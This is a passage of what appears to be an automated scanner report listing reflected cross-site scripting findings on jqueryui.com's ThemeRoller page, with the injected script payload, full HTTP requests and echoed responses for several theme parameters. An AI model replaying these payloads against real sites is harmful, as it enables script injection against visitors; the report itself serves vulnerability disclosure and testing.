GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90b0d13"><script>alert(1)</script>b6c76063701&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:43 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHighlight" class="opacity" value="90b0d13\\\"><script>alert(1)</script>b6c76063701" />
...[SNIP]...

1.145. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 609e4"><script>alert(1)</script>daa0a1be744 was submitted in the bgImgOpacityHover parameter. This input was echoed as 609e4\\\"><script>alert(1)</script>daa0a1be744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70609e4"><script>alert(1)</script>daa0a1be744&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:34 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityHover" class="opacity" value="70609e4\\\"><script>alert(1)</script>daa0a1be744" />
...[SNIP]...

1.146. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a26f7"><script>alert(1)</script>f7385104586 was submitted in the bgImgOpacityOverlay parameter. This input was echoed as a26f7\\\"><script>alert(1)</script>f7385104586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50a26f7"><script>alert(1)</script>f7385104586&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityOverlay" class="opacity" value="50a26f7\\\"><script>alert(1)</script>f7385104586" />
...[SNIP]...

1.147. http://jqueryui.com/themeroller/_rollyourown.php [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed46"><script>alert(1)</script>7837a54b6b5 was submitted in the bgImgOpacityShadow parameter. This input was echoed as 1ed46\\\"><script>alert(1)</script>7837a54b6b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=301ed46"><script>alert(1)</script>7837a54b6b5&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="bgImgOpacityShadow" id="bgImgOpacityShadow" class="opacity" value="301ed46\\\"><script>alert(1)</script>7837a54b6b5" />
...[SNIP]...

1.148. http://jqueryui.com/themeroller/_rollyourown.php [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d57"><script>alert(1)</script>c3ae1d14c80 was submitted in the borderColorActive parameter. This input was echoed as 10d57\\\"><script>alert(1)</script>c3ae1d14c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e10d57"><script>alert(1)</script>c3ae1d14c80&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
<input type="text" name="borderColorActive" id="borderColorActive" class="hex" value="655e4e10d57\\\"><script>alert(1)</script>c3ae1d14c80" size="6" />
...[SNIP]...

1.149. http://jqueryui.com/themeroller/_rollyourown.php [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/_rollyourown.php

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3fb"><script>alert(1)</script>251ce226b67 was submitted in the borderColorContent parameter. This input was echoed as dc3fb\\\"><script>alert(1)</script>251ce226b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/_rollyourown.php?ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846bdc3fb"><script>alert(1)</script>251ce226b67&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://jqueryui.com/themeroller/#ffDefault=Segoe+UI%2C+Arial%2C+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=8px&bgColorHeader=817865&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=45&borderColorHeader=494437&fcHeader=ffffff&iconColorHeader=fadc7a&bgColorContent=feeebd&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=8e846b&fcContent=383838&iconColorContent=d19405&bgColorDefault=fece2f&bgTextureDefault=12_gloss_wave.png&bgImgOpacityDefault=60&borderColorDefault=d19405&fcDefault=4c3000&iconColorDefault=3d3d3d&bgColorHover=ffdd57&bgTextureHover=12_gloss_wave.png&bgImgOpacityHover=70&borderColorHover=a45b13&fcHover=381f00&iconColorHover=bd7b00&bgColorActive=ffffff&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=30&borderColorActive=655e4e&fcActive=0074c7&iconColorActive=eb990f&bgColorHighlight=fff9e5&bgTextureHighlight=12_gloss_wave.png&bgImgOpacityHighlight=90&borderColorHighlight=eeb420&fcHighlight=1f1f1f&iconColorHighlight=ed9f26&bgColorError=d34d17&bgTextureError=07_diagonals_medium.png&bgImgOpacityError=20&borderColorError=ffb73d&fcError=ffffff&iconColorError=ffe180&bgColorOverlay=5c5c5c&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=50&opacityOverlay=80&bgColorShadow=cccccc&bgTextureShadow=01_flat.png&bgImgOpacityShadow=30&opacityShadow=60&thicknessShadow=7px&offsetTopShadow=-7px&offsetLeftShadow=-7px&cornerRadiusShadow=8px
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.4.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:27 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 39552


<!-- Download theme button -->
<a href="/download?themeParams=%3FffDefault%3DSegoe%2BUI%252C%2BArial%252C%2Bsans-serif%26fwDefault%3Dbold%26fsDefault%3D1.1em%26cornerRadius%3D8px%26bgColorHeader%3
...[SNIP]...
